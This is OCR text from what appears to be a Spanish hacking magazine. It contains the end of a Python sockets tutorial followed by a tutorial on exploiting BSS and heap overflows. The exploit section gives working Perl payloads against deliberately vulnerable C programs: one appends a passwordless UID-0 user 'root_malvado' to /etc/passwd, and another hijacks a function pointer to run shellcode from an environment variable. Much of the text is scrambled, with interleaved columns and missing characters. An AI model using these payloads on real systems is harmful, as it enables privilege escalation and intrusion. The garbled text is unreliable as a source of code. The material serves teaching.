>>> def funcion():
... print 'Probando funcion...'
...
>>> funcion()
Probando funcion...
>>>
Crear ahora nuestros propios mdulos

importables sera tan sencillo como
crear un fichero lleno de nuestras fun
ciones y en nuestros programas impor
tar aquellas que necesitramos. til y
rpido.
Bueno, si habis llegado hasta aqu sin
dormiros es que tenis mucha pacien
cia. Lo agradezco y espero que hasta el
momento os haya gustado el desarrollo
del artculo. Puede que se est haciendo
algo corto, pero debis comprender que
explicar todas y cada una de las funcio
nes y mtodos que hemos visto hasta
ahora sera interminable as que he pre
ferido mencionarlas y daros las herra
mientas para que las busquis ( dir() )
y miris como funcionan por vuestra
cuenta (adems as se aprende mejor.
Tropezando y levantndose). ahora lle
gamos a una parte ms interesante.
Vamos a aprender a pasar argumentos
al programa y como aliciente para que
hagis experimentos en casa aprende
remos a programar sockets. Eso s, na
da de mdulos. Sockets a mano y en
bruto ;)
Creamos la funcin y luego simplemen

te la llamamos. Esta funcin no necesi
taba parmetros pero y si quisiramos
pasarle datos?
>>> def funcion(x,y):
... print x*y
...
>>> funcion(3,4)
12
>>>
Sencillo. Le indicamos los parmetros
que necesita para funcionar y luego
operamos con ellos. Y si necesitamos
que la funcin nos devuelva un valor?
Para eso usamos la instruccin return.
>>> def funcion_ret(x,y):
... return x+y
...
>>> z funcion_ret(3,4)
>>> print z
7
>>>
Devolvemos el valor y lo almacenamos
en una variable (z) y luego ya podemos
Quizs os preguntis porque hasta el

momento no he explicado para que sir
ve los programas del principio. Bueno,
una razn es que creo que sois lo bas
tante listos como para averiguarlo pero
bsicamente es porque hasta el mo
mento no ha sido necesario echar mano
de ellos para las explicaciones. Hasta el
momento...
Los programas son dos: el echoserver.py es un programa que abre el
puerto que tu le digas y se pone a la es
cucha. Su funcin es, como su nombre
indica, devolver dato a dato todo lo que
le manden a quien se lo mand. El
echo-client.py es el cliente del server
(aunque podrais usar cualquier progra
ma de conexin como telnet o netcat).
Manda cadenas de caracteres y luego
muestra por pantalla lo que recibe del
server.
A veces nos interesa que un programa

tenga varias opciones disponibles y no
es factible hacer un men de usuario.
Aqu entran en juego los argumentos.
Para realizar esta tarea necesitaremos
la ayuda del mdulo sys.
Se imprime la lista entera (entre cor

chetes) de todos los argumentos, y co
mo podis ver, el primero es el propio
nombre del programa. Ahora ya podris
crear programas mas aparentes y pro
fesionales ;)
La lista que almacena los argumentos

del programa es argv y puede ser im
portada del mdulo sys.
Ve a m o s n u e s t r o p r o g ra m a e c h o server.py:
import socket,sys
.......
if (len(sys.argv)! 2):
print './echoserver.py [puerto]'
sys.exit(10)
Como podemos ver, se importa sys y te
nemos disponible argv. El primer ele
mento de argv y que siempre esta pre
sente es el mismo nombre del progra
ma. Despus vendran todos los argu
mentos que se le pasen al programa (es
importante que recordis que como en
las listas, se empieza a numerar a partir
del cero, por si necesitis acceder a un
elemento en particular).
En el programa comprobamos la longi
tud de la lista argv usando la funcin
len() y vemos si es distinta de dos. Si lo
es, les soltamos el manual del usuario
para recordar como se usa el programa,
y salimos. La funcin exit(), aprove
chando la ocasin, es una forma rpida
de salir del programa en curso. Si se
omite el parmetro se considera salida
correcta (o igual a cero).
Lleg el tan ansiado momento. Espero

explicarme bien y que me comprendis.
Vamos a explicar una por una las intruc
ciones de los programas server.py y
client.py.
Primero el servidor:
s socket.socket(socket.AF INET,socket.SOCK STREAM)
s.listen(5)
Aqu creamos un socket TCP al llamar a
la funcin socket() del mdulo socket
(fijaos: socket.socket) y lo asignamos a
la variable s. Los parmetros le indi
can que es un socket TCP. El primer pa
rmetro, AF INET, indica que usaremos
el protocolo IP y el segundo parmetro,
SOCK STREAM indica que es un socket
que usa el protocolo TCP.
Todas las opciones disponibles como pa
rmetros son:
AF_INET:
AF_UNIX:
indica sockets IP
indica sockets UNIX en la
mquina local
SOCK_STREAM: indica protocolo TCP
SOCK_DGRAM: indica protocolo UDP
SOCK_RAW:
indica raw socket (en crudo)
s.bind((maquina,puerto))
Vamos a hacer otra prueba con el argv
para que veis como es (un programa
muy sencillo):
prueba argv.py
import sys
print sys.argv
Si lo ejecutamos con argumentos:
La variable puerto, si veis el cdigo del

programa, es igual a argv[1], es decir,
que el puerto se lo pasamos por consola
(repasad otra vez el apartado de argv si
no lo tenis claro), y la variable maqui
na equivale a la cadena vaca ( '' comi
llas simples). Por qu la cadena vaca?
Porque el host en un server se declara
as, indicando que la funcin bind() se
ejecuta en la mquina local. Los avispa
dos os habris dado cuenta de que di
cha variable podra contener cualquier
otra cosa. Es cierto, podra contener
una IP por ejemplo, pero tened en
cuenta que a no ser que esa IP coincida
con la del ordenador donde se est eje
cutando el programa, este no funciona
r :P
Ligamos el socket a una direccin IP y

un puerto con bind() (fijaos que pongo
la variable con un punto y luego la
funcin. Esto tiene que ver con la
programacin de objetos pero ya lo ve
remos otro da. Quedaos con que se ha
ce as y listos). Si os fijis, hay doble
parntesis. No es un error de imprenta.
Bind() necesita que se lepasen los par
metros en una tupla, y las tuplas, si re
cordis se declaran entre parntesis.
Shadowland:~/python$ ./prueba_argv.py hola segundo mirando argumentos

['./prueba_argv.py', 'hola', 'segundo', 'mirando', 'argumentos']
Shadowland:~/python$
Esto es sencillo. Pone a escuchar al soc

ket en el puerto y limita el numero
mximo de conexiones aceptadas antes
de empezar a denegar el acceso (en es
te caso 5). Como nuestro server no est
programado con threads, aceptar la
primera conexin y las siguientes 5 las
dejar en espera hasta que el server
est disponible.
Es necesario siempre el parmetro de
listen() con un mnimo de 1.
En estos momentos, el server esta listo
y a la escucha y se pone en bucle infini
to a la espera de conexiones entrantes
(por eso el while 1. Por cierto, por si no
lo habis deducido, para salir del server
en ejecucin la nica forma es pulsar
Ctrl-C, como en el netcat ;P )
conn,dir_conn s.accept()
Aceptamos la conexin entrante y alma
cenamos los datos en dos variables (en
Python est permitida la asignacin
mltiple). La conexin real se almacena
en la variable conn y la direccin del
cliente en dir conn
eco(conn,dir conn)
Llamamos a nuestra funcin eco() con
los dos parmetros obtenidos en acce
pt(), y dentro de ella entraremos en
otro bucle infinito para ir leyendo la
informacin segn vaya llegando.
data conn.recv(1024)
13
Recibimos 1024 bytes (1 kb) de

informacin y la almacenamos en la va
riable data.
if not data: break
Si llegara el momento de que data fuera
igual a la cadena vaca, lo que significa
ra que no se han recibido ms datos, el
bucle while infinito se rompera (gracias
a break)
conn.send('Echo > '+data)
Enva de vuelta al cliente los datos reci
bidos en data con send()
conn.close()
Cierra la conexin una vez acabado el
bucle.
Con todo esto queda explicado el ser
ver. Ahora nos meteremos con el clien
te. Ser ms sencillo y rpido de expli
car puesto que ya hemos visto como
funcionan las cosas. Metmonos en ha
rina:
s socket.socket(socket.AF_INET,socket.SOCK_STREAM)
Creamos el objeto socket como en el

server.
s.connect((maquina, puerto))
Conectamos al par maquina:puerto me
diante connect(). Este funciona igual
que bind() slo que conecta a la mqui
na destino en vez de ligar un puerto al
socket. Necesita, al igual que bind(),
que se le pasen los parmetros en una

tupla.
s.send(linea)
Manda el contenido de la variable linea
al host destino.
servidor SMTP y enve un e-mail. Para

los que hayan seguido la revista, la
explicacin de los comandos SMTP ha
salido en el curso de PyC. Para quienes
no la hayan seguido, os har un breve
resumen:
HELO mi_nombre
data s.recv(1024)
MAIL FROM: mi_mail
Recibe el resultado.
s.close()
RCPT TO: correo_destino
Cierra el socket.
Bien, ya est. Supongo que no ha sido
tan doloroso ni complicado, verdad?
Con esto tenemos una buena base para
desarrollar nuestras pequeas aplicacio
nes orientadas a la conexin, ya sean
servers o clientes.
Hemos llegado al final del artculo. Ha
quedado ms corto que el primero pero
esto es as porque el primero era todo
el peazo de la sintaxis del lenguaje y
haba que dejarlo claro. Pensad que hu
biera pasado si no lo hubiera hecho.
Dos artculos seguidos aguantando un
tostn? ;P
Para no variar las costumbres os voy a
poner un ejercicio para que vayis prac
ticando todo.
Ejercicio:
Tomando como base lo que hemos ex
plicado, debis intentar crear un progra
ma que usando sockets se conecte a un
QUIT
para identifi
carse uno mis
mo
para indicar el
remitente del
correo
para indicar el
receptor del
correo
para salir del
SMTP
Debis recordar que para finalizar el

texto del mensaje tenis que acabar
con un punto en una linea independien
te, y un retorno de carro, as:
Este es un mensaje de prueba. Tanto gusto.
.<cr>
Y aqu acabamos. Hasta el Episodio 3.
Saludos...
PD: uh-oh, se me olvidaba. Un breve
resumen de lo que vendr en el siguien
te artculo: Ficheros, Objetos y clases,
Mdulos de sockets especializados y una
sorpresita (no os lo voy a decir todo,
verdad? ;) )
Agradecimientos a HpN, HxC y a mi mu
jer Marta
PON AQU TU PUBLICIDAD

precios desde
14
99 euros
Has pensado alguna vez en

poner TU PUBLICIDAD en
una revista de cobertura
nacional?
Has preguntado
precios y comprobado
que son demasiado
elevados como para
amortizar la inversin?
Con nosotros, la publicidad est al alcance de todos
Bienvenido a esta segunda entrega de esta pequea serie de artculos sobre

explotacin de vulnerabilidades. Ya hablamos en el artculo anterior sobre los desbordamientos de
buffer ocurridos en la pila. En este artculo vamos a ver cmo aprovecharnos de desbordamientos
ocurridos en otras secciones de memoria, en especial en las secciones denominadas Heap y BSS.
Antes explicar un poco el uso de la memoria dinmica mediante la funcin malloc(), para que pue
das entender mejor los cdigos incluidos en el artculo. Que lo disfrutes ;-)
tipo de funciones es para realizar contadores del nmero
de ejecuciones de una funcin, y que no haga cierta tarea
ms de un nmero determinado de veces.
En esta seccin vamos a ver cmo se definen variables
globales y estticas (static), entenderemos la necesidad
de la memoria dinmica, y aprenderemos cmo usarla en
C. Lo ideal sera que tuvieras algunas nociones muy bsi
cas de C (y si no son tan bsicas, pues mucho mejor ;-) ),
aunque sabiendo algo de programacin, sea el lenguaje
que sea, no te ser difcil seguir estas sencillas explicacio
nes. Adems, teniendo el curso de Python escrito por
Moleman en esta misma revista, no tienes excusa :P
Hablemos primero de las variables globales. Como ya debes
saber, cuando creamos una variable dentro de una funcin,
sta se almacena en la pila (ya lo vimos en el artculo ante
rior), y solamente se puede acceder a ella desde la propia
funcin que la ha creado. Sin embargo, si deseamos poder
acceder a una variable desde todo nuestro programa, y man
tener su valor en el punto que sea de su ejecucin, debere
mos declarar esta variable como global, declarndola al prin
cipio de nuestro cdigo, fuera de ninguna funcin. Si no se
inicializan en el momento de su creacin, este tipo de varia
bles se almacenan en el segmento BSS. Si son inicializadas,
se almacenan en el segmento de datos.
Por otro lado, tenemos las variables estticas, que se
crean dentro de una funcin, pero no se destruyen al fina
lizar sta. As, cuando volvamos a llamar a la funcin, su
valor permanecer igual que antes. Un posible uso de este
34
Veamos qu pasa con el siguiente cdigo:

Cdigo ejemplo1.c:
#include <stdio.h>
int numero;
int main(){
int funcion();
numero 0;
while(funcion() 0 )
printf("numero vale: %d\n", numero);
}
int funcion(){
static cont 0;
if(cont<3){
numero rand();
printf("Ya he hecho mi faena :P [%d] \n",cont);
cont++;
return 0;
} else {
printf("Estoy cansada. Ya me has ejecutado demasiadas veces\n");
return 1;
}
}
ste se va a ganar el premio al cdigo

ms chorra del ao :-D. Lo nico que ha
ce es crear una variable global (numero),
y luego en el main la inicializa a 0 y eje
cuta la funcin en un bucle hasta que s
te devuelva un valor distinto de 0.
La funcin har su tarea (sacar un
nmero seudo-aleatorio) hasta que cont
tome el valor 3. A partir de entonces la
funcin se negar a hacerlo, pues consi
derar haberse ejecutado demasiadas ve
ces. Veamos la salida de este programa:
nos provee la librera estndar, entre las

cuales se encuentran las funciones ma
lloc, calloc, free.. Las funciones malloc()
y calloc() nos sirven para reservar me
moria dinmica (localizada en el seg
mento Heap), mientras que free() se
utilizar cuando hayamos terminado de
usar dicha memoria, para liberar el es
pacio reservado y que as pueda utili
zarse para posteriores peticiones de re
serva de memoria dinmica.
La funcin malloc() recibe como par

metro la cantidad de memoria a
tuxed@athenea:~/articulo2$ gcc ejemplo1.c o ejemplo1 reservar, y devuelve un puntero a
tuxed@athenea:~/articulo2$ ./ejemplo1
la nueva zona de memoria reser
Ya he hecho mi faena :P [0]
vada, con lo que nicamente po
numero vale: 1804289383
dremos acceder a ella a travs de
ste. Una vez acabemos de utili
zarla, liberaremos la memoria
haciendo una llamada a free(),
pasando como parmetro el pun
Estoy cansada. Ya me has ejecutado demasiadas veces
tuxed@athenea:~/articulo2$
tero devuelto por malloc().
Como puedes ver, funciona tal y como

he explicado, aunque si lo vuelves a
ejecutar te dar los mismo valores para
la variable numero, puesto que rand()
debera haberse inicializado mediante la
funcin srand(), pero eso ya es otra his
toria ;-)
Veamos ahora la memoria dinmica.
Imagina que tienes un programa que va
a almacenar datos en un buffer. Como
no sabemos qu cantidad de datos va a
darnos el usuario, no sabemos el espa
cio que debemos reservar para l. Sin
embargo, por qu no le pedimos que
nos diga cuntos datos nos va a entre
gar, y luego lo creamos? Sera una bue
na opcin, pero, cmo se hace?
Si aprendiste C, seguramente te dijeron
que las variables se deban declarar al
principio de cada funcin, y que no se
poda hacer algo como:
printf(Cuantos caracteres me vas a dar?);
scanf(%d, &carac);
char buffer[carac];
Si hacemos algo as, el compilador nos
arrojar un bonito error. Sin embargo,
para este tipo de cosas existe la memo
ria dinmica.
Para manejar la memoria dinmica en
C, tenemos una serie de funciones que
Vamos a ver un pequeo ejemplo que

calcular la media de una cantidad des
conocida de nmeros enteros. Lo que
haremos ser pedirle al usuario la canti
dad de datos que nos va a dar, y reser
var espacio para un vector de enteros
de ese tamao.
Lo siguiente ser pedirle esos datos en
un bucle, calcular la media, e imprimirla
por pantalla. Al final de todo este proce
so, procederemos a liberar la memoria
reservada.
El cdigo es el siguiente:
Cdigo ejemplo2.c:
#include <stdio.h>
int main(){
int num,i;
float suma 0;
int *ptr;
printf("Dime el nmero de datos: ");
scanf("%d", &num);
ptr (int *)malloc(num*sizeof(int));
for(i 0;i<num;i++){
printf("Elemento %d >", i+1);
scanf("%d", ptr+i*sizeof(int) );
}
for(i 0;i<num;i++)
suma+ ptr[i];
suma suma/num;
printf("La media es %f\n", suma);
free(ptr);
return 0;
}
Espero que este pequeo ejemplo ilus
tre lo suficientemente bien el uso de la
memoria dinmica mediante la funcin
malloc() y free(), y que as os podis
hacer una idea de qu es lo que vamos
a atacar ;-).
Como veis, se pueden crear variables de
un tamao elegido por el usuario, o por
el propio programa, en tiempo de
ejecucin. Sin embargo, si no tomamos
las precauciones oportunas, sigue sien
do posible desbordar un buffer creado
de esta forma, sobrescribiendo memoria
ms all de los lmites que nos pertene
cen ;-).
Si recuerdas, en el artculo anterior nos
aprovechbamos de la direccin de re
torno de la funcin actual guardada en
la pila, sobrescribindola con la
direccin de un cdigo mquina (shell
code) que previamente habamos situa
do en memoria, para que al intentar re
tornar, la ejecucin del programa caye
ra en dicho cdigo e hiciese lo que cre
yramos oportuno (en general, brindar
nos acceso al sistema :-) ). Sin em
bargo, esta vez el buffer que vamos a
sobrescribir estar en el segmento BSS
o en el Heap, donde no hay ninguna
direccin de retorno almacenada ni na
da que se le parezca. As, en este caso
deberemos tirar mano de otras cosas.
Y supongo que te estars preguntan
do... Pero qu cosas exactamente? Lo
ms lgico en un desbordamiento de
este tipo, es pensar en sobrescribir va
riables importantes de nuestro progra
ma, como por ejemplo nombres de fi
chero ( engaando al programa para
que escriba, por ejemplo, en
/etc/passwd ), punteros a funciones (en
este caso probablemente podamos eje
cutar una shellcode almacenada en me
moria ;-) ), variables de autenticacin
( como un UID almacenado en el pro
grama, que sirva para verificar si somos
root o no...).
Por otra parte, tenemos otras tcnicas
un poco ms complejas, vlidas
nicamente para explotar desborda
35
mientos en el segmento Heap, en las

cuales se trata de aprovecharse del ma
nejo de la memoria dinmica de nuestro
sistema operativo, para intentar ejecu
tar cdigo como si de un stack-based
overflow se tratara.
Vamos a ver qu podemos hacer ;-).
Como ya he dicho antes, una posibilidad

bastante sencilla a la hora de explotar
un desbordamiento de buffer en el
Heap, es sobrescribir un nombre de ar
chivo por otro a nuestra eleccin, para
poder meter en l aquello que desee
mos. Para comprobar cmo se hace es
to, vamos a utilizar un pequeo progra
ma de prueba, que servir para aadir
lneas a una lista, por ejemplo una lista
de cosas por hacer.
En este caso, vamos a usar variables
estticas. Por tanto, lo que vamos a ex
plotar es un BSS-based overflow:
bss1.c:
#include <stdio.h>
int main(int argc, char *argv[]){
FILE *todo;
static char linea[100];
static char archivo[40];
if ( argc<2 ){
printf("Uso: %s [mensaje]\n", argv[0]);
return -1;
}
strcpy(archivo, "todo.txt");
primer argumento de nuestro progra

ma. Una vez hecho esto, abrimos el ar
chivo para aadirle datos (parmetro a
[append] de fopen ), y escribe la lnea
que le hemos pasado. Las siguientes l
neas muestran el funcionamiento nor
mal de este programa:
Imagina ahora que tenemos un archivo

llamado usuarios en nuestro directorio,
y que es propiedad del administrador
del sistema [Lo s, es muy cutre, pero
no deja de ser un ejemplo, no? :-P ].
Este archivo contiene una lista de los
usuarios que pueden usar cierto comando
del sistema que nos in
teresa mucho, pero no
tuxed@athenea:~/Articulos HxC/art2$ ./bss1 "Acabar artculo Heap Overflow"
Linea a escribir: Acabar artculo Heap Overflow
contiene nuestro nombre
Archivo: todo.txt
de usuario. Se te ocurre
Escritura realizada correctamente ;-)
algo? Supongo que como
tuxed@athenea:~/Articulos HxC/art2$ ./bss1 "Comprar embudo nuevo :D"
yo, estars pensando en
Linea a escribir: Comprar embudo nuevo :D
sobrescribir la variable
Archivo: todo.txt
archivo de nuestro pro
tuxed@athenea:~/Articulos HxC/art2$ cat todo.txt
grama por la palabra
Acabar artculo Heap Overflow
usuarios, y en la lista de
Comprar embudo nuevo :D
usuarios escribir nuestro
tuxed@athenea:~/Articulos HxC/art2$
nombre. Para ello, el
programa bss1 debera ser propiedad de
Ahora bien, vemos que se disponen de root y tener el bit SUID activado, pues si
100 caracteres para el buffer linea, pero no es as, no podremos modificar un ar
no se comprueba la longitud del argumen chivo que no nos pertenece.
to pasado al programa, sino que simple
mente se copia con la funcin strcpy. As Un detalle importante, es que debemos
pues, ya tenemos algo para jugar :-) rellenar los 128 bytes del buffer. Adems,
Probaremos a meter ms datos al progra queremos poner nuestro nombre de
ma, a ver si somos capaces de escribir lo usuario tal cual en el archivo (tuxed en
que deseemos en la variable archivo.
este ejemplo) solo en una lnea, as que
tuxed@athenea:~/Articulos HxC/art2$ ./bss1 `perl -e 'print "A"x110'`
Linea a escribir: AAAAAAAAAAAAAAAAA (...hasta 110 A's)
Archivo: todo.txt
Linea a escribir: AAAAAAAAAAAAAAAAA (...)
Archivo: AA
Linea a escribir: AAAAAAAAAAAAAAAAA (...)
Archivo:
Violacin de segmento
strcpy(linea, argv[1]);
/* Debug info ;-) */
printf("Linea a escribir: %s \n", linea);
printf("Archivo: %s\n", archivo);
todo fopen(archivo, "a");
fputs(linea,todo);
fputs("\n", todo);
printf("Escritura realizada correctamente ;-)\n");
return 0;
}
Como puedes ver, simplemente creamos

dos variables estticas (segmento BSS),
guardamos en la variable archivo el
nombre de nuestra lista de cosas por
hacer, y copiamos en la variable linea el
36
Como se puede ver en estas lneas, si

metemos 110 caracteres, la cosa sigue
funcionando a la perfeccin. En cambio,
en cuanto pasamos de 128, estamos
sobrescribiendo el archivo donde vamos
a escribir. En el primer caso, con 130 le
tras A, hemos sobrescrito el nombre de
archivo por AA, mientras que en el se
gundo, ha quedado una cadena vaca,
pues lo nico que se ha escrito ha sido
el byte nulo que identifica el final de ca
dena. As, cuando intentamos abrir el
archivo, no pasamos un nombre vlido
a fopen, con lo que no podremos usarlo
para escribir cosas, y de ah la violacin
de segmento.
deberemos idearnoslas para que

los 128 bytes incluyan tuxed en
una lnea, y que a partir de esos
128 bytes est el nombre del fi
chero que queremos modificar.
Por tanto, lo que vamos a hacer

es poner al principio del buffer
nuestro nombre de usuario, se
guido de un carcter new line
(NL, cdigo ASCII 0x0A en
hexadecimal), y despus 122
letras cualesquiera (128 bytes
menos la longitud de la cadena tuxed
menos el carcter NL ), y despus el
nombre del archivo ( la palabra usuarios
). La siguiente salida muestra el estado
del archivo usuarios antes de la ejecucin
de nuestro plan, la ejecucin del mismo,
y dicho archivo justo despus: (ver lis
tado 1)
Como vemos, hemos podido sobrescri
bir el archivo usuarios con nuestro nom
bre de usuario, aunque le ha quedado
una bonita lnea de 122 letras A, ms el
nombre del propio archivo. Esto es por
que la cadena linea del programa vulne
rable inclua todo eso, y eso es lo que
se ha insertado en el archivo.
tuxed@athenea:~/Articulos HxC/art2$ cat usuarios

pepito
azimut
tuxed@athenea:~/Articulos HxC/art2$ ./bss1 "`perl -e 'print "tuxed"."\x0A"."A"x122 . "usuarios"'`"
Linea a escribir: tuxed
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAusu
arios
Archivo: usuarios
tuxed@athenea:~/Articulos HxC/art2$ cat usuarios
pepito
azimut
tuxed
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAusu
arios
Listado 1
Vamos ahora a intentar modificar un ar
chivo crucial de nuestro sistema. Se tra
t a d e l a r c h i vo d e l s i s t e m a l l a m a d o
/etc/passwd. En este archivo se encuen
tran los usuarios de nuestro sistema,
con un formato muy concreto. Veamos
una lnea del archivo en cuestin:
Sin embargo, si analizamos el formato

de dicho archivo, y lo que pas anterior
mente con el archivo usuarios, vemos
que el final de la linea que agreguemos
va a ser, obligatoriamente, /etc/passwd
, pero el ltimo campo de sta debera
identificar la shell de acceso al sistema,
as que no puede ser /etc/passwd sim
root:x:0:0:root:/root:/bin/bash
En cada lnea del archivo, hay varios
campos separados por el signo :. De iz
quierda a derecha, son: nombre de
usuario, contrasea encriptada, UID,
GID, comentario, directorio de trabajo
(home del usuario), y por ltimo, la
shell que se ejecutar cuando este
usuario haga login en el sistema. El
campo contrasea es opcional, puede
estar vaco (sin password), o contener
una x, que indica que la contrasea en
criptada se guarda en otro archivo (con
cretamente, /etc/shadow ).
Adems, como ya sabrs, el uid 0 indica
privilegios de root, y encima en el archi
vo /etc/passwd pueden haber varios
usuarios con uid 0... Supongo que ya
imaginas que vamos a hacer, no? ;-).
Vamos a crear una nueva lnea en el ar
chivo /etc/passwd que nos proporcione
un usuario root, con el que poder hacer
login en el sistema.
plemente, puesto que al no ser una

shell vlida, no se ejecutar. Entonces,
qu hacemos? Muy sencillo, vamos a
crearnos un enlace simblico hacia la
shell de bash ( /bin/bash ), cuya ruta
acabe en /etc/passwd (por ejemplo,
/tmp/etc/passwd). Una vez hecho esto,
simplemente debemos ajustar nuestro
buffer para que cumpla con las condi
ciones deseadas.
Necesitamos que tenga 128 caracteres
ms la longitud de /etc/passwd (11 ca
racteres). Por tanto, nuestra linea va a
tener 139 caracteres. Como nombre de
usuario, vamos a poner root malvado
(12 caracteres), password en blanco,
uid y gid los mismos de root (0 para
ambos), directorio home /root (5 carac
teres ms) y como shell,
/tmp/etc/passwd, como ya hemos di
cho. As, si sumamos todos los campos,
incluyendo los separadores de campo,
tenemos 40 caracteres. Por tanto, para
que las cosas vayan bien, necesitamos
99 caracteres ms, pero... y qu hace
mos con ellos? Pues meterlos en el

campo de comentarios :-).
Ahora s, tenemos claro qu hacer, as
que no se hable ms. Accin!(ver lista
do 2)
Ahora si miramos el archivo
/etc/passwd, tendremos un usuario llamado root malvado, sin password. Solo
nos queda loguearnos como ese usua
rio, y ya tenemos nuestra shell de root
;-).
Para acabar con este programa, sola
mente me queda hacer un pequeo co
mentario. Mientras haca mis pruebas,
estaba trabajando en las X al mismo
tiempo que escriba este artculo en el
OpenOffice.org, y despus de agregar
mi nuevo usuario mediante la tcnica
expuesta, proced a loguearme con l
va el comando su root malvado. Cul
fue mi sorpresa que me peda
contrasea y me daba error de
autenticacin al dar a INTRO sin escribir
contrasea alguna. Por lo que he podido
comprobar, esto solo pasa en Debian, y
no ocurre si haces un login normal al
sistema con el nuevo usuario, y tampo
co si se hace el su desde una consola
virtual (ttyX, esas que se acceden me
diante Ctrol-Alt-Fx).
Adems, es conveniente comentar que
esta vulnerabilidad perfectamente poda
haber ocurrido en el Heap, que la ha
bramos tratado exactamente igual,
aunque los tamaos del buffer habran
variado un poquito. Os animo a probarlo
cambiando las lneas:
static char linea[100];
static char archivo[40];
Por stas:
char *linea;
char *archivo;
linea malloc(100);archivo malloc(40);
Listado 2
tuxed@athenea:~/articulo2$ mkdir /tmp/etc
tuxed@athenea:~/articulo2$ ln -s /bin/bash /tmp/etc/passwd
tuxed@athenea:~/articulo2$ ./bss1 `perl -e 'print "root_malvado::0:0:"."A"x99 .":/root:/tmp/etc/passwd"'`
Linea a escribir: root_malvado::0:0:AAAAAAAAAAAAA (...)AAAAAAAAAAAA:/root:/tmp/etc/passwd
Archivo: /etc/passwd
Vamos ahora a trastear con el siguiente

programa:
37
Cdigo bss2.c:
#include <stdio.h>
int alta(char cliente[]){
/*Aqu el cdigo que da de alta un cliente */
printf("He dado de alta el cliente ;-)\n");
return 0;
}
int baja(char cliente[]){
/* Aqu el cdigo de baja de un cliente */
printf("Cliente dado de baja :(\n");
return 0;
}
int main(int argc, char *argv[] ){
static char nombre[50];
static int (*ptr_func)(char *cliente);
jugar con l. Cmo? Pues ya sabes,

dndole ms cosas de las que puede
aguantar y observando los cambios que
sufre nuestro amado punterito :-D :
Como puedes observar, se ha utilizado

la misma shellcode que en el artculo
anterior, que puedes encontrar (junto a
los dems cdigos de ambos artculos)
en el foro :-) Adems, en esta
tuxed@athenea:~/articulo2$ ./bss2 alta `perl -e 'print "A"x54'`
ocasin no se ha dado privilegios de
Puntero apunta a 0x8004141
root al programa, y por eso la shell
devuelta es de nuestro propio usua
rio. En caso de haber puesto el bi
nario como SUID root, la shell ten
dra privilegios de root ;-)
Sin embargo, este mtodo necesita de

una pila ejecutable. En caso de que
nos encontremos ante un sistema con pi
la no ejecutable, nuestro ataque no sera
viable, pues nuestra shellcode no podra
ejecutarse. Aun as, tenemos un buffer
que hemos rellenado de letras A, y que
Como se puede ver, con 54 caracteres

logramos modificar la mitad del pun
if(argc<3){
tero a la funcin. Con 56 la logramos
printf("Uso: %s <alta|baja> Nombre_cliente\n",argv[0]);
modificar entera :-). Puesto que
exit(-1);
nuestro cdigo luego llama a dicha
}
funcin mediante el
if(strcmp(argv[1],"alta") 0)
puntero, aqu tenemos GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
ptr_func (int (*)(char *))alta;
un punto desde el cual
GDB is free software, covered by the GNU General Public License, and you are
else
redirigir la ejecucin welcome to change it and/or distribute copies of it under certain conditions.
if(strcmp(argv[1],"baja") 0)
del programa hacia un Type "show copying" to see the conditions.
ptr_func (int (*)(char* ))baja;
There is absolutely no warranty for GDB. Type "show warranty" for details.
cdigo nuestro ;-).
else
return -1;
A h o r a , s i q u e r e m o s This GDB was configured as "i386-linux"...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
strcpy(nombre, argv[2]);
aprovecharnos, lo ms
printf(Punetro apunta a: %p\n,ptr_func);
sencillo sera hacer lo (gdb) break main
(*ptr_func)(nombre);
mismo que hacamos Breakpoint 1 at 0x8048466: file bss2.c, line 19.
return 0;
(gdb) run alta `perl -e 'print "A"x56'`
con los desbordamien
}
tos en la pila. Puesto Starting program: /home/tuxed/articulo2/bss2 alta `perl -e 'print "A"x56'`
que disponemos de una
Breakpoint 1, main (argc 3, argv 0xbffff9a4) at bss2.c:19
Como puedes deducir, es un simple pro
direccin de memoria 19
if(argc<3){
grama que emula manejar una base de
que podemos modificar (gdb) p &nombre
datos de clientes. Pasando como par
a nuestro antojo, y el $1 (char (*)[50]) 0x8049820
metros alta nombre cliente daremos de
programa vulnerable va (gdb)
alta un cliente. Si pasamos baja nom
a saltar a esa direccin
Listado 3
bre cliente daremos de baja el cliente.
de memoria, pondremos una shellcode
podramos rellenar con el cdigo de nues
en una variable de entorno, obtendre
Evidentemente, no he implementado el
tra shellcode :-). En primer lugar, mete
mos su direccin, y modificaremos el
programa entero, sino solamente un par
remos la shellcode en el propio buffer,
puntero con sta ;-) [Ojo que debere
de cosas para que podamos ver cmo
precedida de instrucciones NOP (byte
mos meterla en orden inverso, debido al
explotar este tipo de programas que
0x90). Por ltimo, deber incluirse, a par
formato little-endian].
utilizan un puntero a una funcin, de
tir de la posicin 53 del buffer,
clarado justo despus de un buffer pro
tuxed@athenea:~/articulo2$ export SCODE `cat scode`;
la direccin de memoria del
tuxed@athenea:~/articulo2$ ./envi SCODE
penso a desbordamientos :-) Vamos a
mismo buffer.
La variable SCODE est en la direccin 0xbffffb17
ver si funciona como debera:
tuxed@athenea:~/articulo2$ ./BSS
Aunque este mtodo requiere
bss1 bss2
tuxed@athenea:~/articulo2$ gcc bss2.c -o bss2 -g
que el segmento Heap sea eje
tuxed@athenea:~/articulo2$ ./bss2 alta `perl -e 'print "\x17\xfb\xff\xbf"x14'`
tuxed@athenea:~/articulo2$ ./bss2
cutable, es ms comn encon
Puntero apunta a 0xbffffb17
Uso: ./bss2 <alta|baja> Nombre_cliente
sh-3.00$
trarse ante una pila no ejecu
tuxed@athenea:~/articulo2$ ./bss2 alta pepito_la_flor
table que ante un Heap no eje
As pues, armados de los cdigos del ar
He dado de alta el cliente ;-)
cutable, as que las probabilidades de que
tculo anterior para localizar las varia
tuxed@athenea:~/articulo2$ ./bss2 baja pepito_la_flor
funcione este mtodo son mayores ;-)
bles de entorno (estn disponibles en el
Puntero apunta a 0x804843d
Cliente dado de baja :(
foro de esta revista desde el da de Probemos de nuevo a explotar este bug,
publicacin del nmero 27) nos dispo usando esta segunda tcnica :-). En pri
nemos a atacar :
mer lugar, averiguaremos la direccin
